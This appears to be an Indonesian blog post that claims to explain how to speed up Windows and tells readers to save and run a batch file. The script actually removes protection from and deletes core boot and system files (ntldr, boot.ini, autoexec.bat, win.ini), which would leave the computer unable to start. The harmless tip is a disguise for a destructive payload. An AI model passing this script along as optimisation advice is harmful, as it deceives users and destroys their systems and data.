Rabu, 04 Januari 2012

Cara Mempercepat Windows | New

1. Buka Notepad
2. Copy Code Berikut

Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


3. Lalu Save as. (untuk nama terserah anda).bat

4. Buka file tersebut

Tidak ada komentar:

Posting Komentar